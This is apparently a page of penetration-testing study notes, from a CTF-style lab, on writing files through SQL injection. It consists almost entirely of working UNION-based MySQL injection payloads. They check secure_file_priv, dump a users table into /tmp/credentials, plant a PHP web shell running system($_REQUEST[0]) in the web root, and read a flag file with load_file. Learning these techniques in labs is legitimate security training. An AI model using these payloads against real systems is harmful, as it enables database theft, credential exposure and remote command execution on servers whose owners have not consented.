Writing Files

Check secure_file_priv

cn'
UNION
SELECT 1,variable_name,variable_value,4
FROM information_schema.global_variables
WHERE variable_name="secure_file_priv"--

And the result shows that the secure_file_priv value is empty, meaning that we can read/write files to any location.

Writing files

# save table
SELECT * from users INTO OUTFILE '/tmp/credentials';
# directly write string to txt
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';

cn'
union
select 1,'file written successfully!',3,4 
into outfile '/var/www/html/proof.txt'-- -

Web shell

cn'
union
select "",'<?php system($_REQUEST[0]); ?>', "", ""
into outfile '/var/www/html/shell.php'--

Find the flag by using a webshell.

cn'
union
select "",'<?php system("find / -name *flag*"); ?>',"",""
into outfile '/var/www/html/find.php'--

cn'
union
select "",load_file("/var/www/flag.txt"),"",""--

PreviousReading Files NextMitigation

Last updated 9 months ago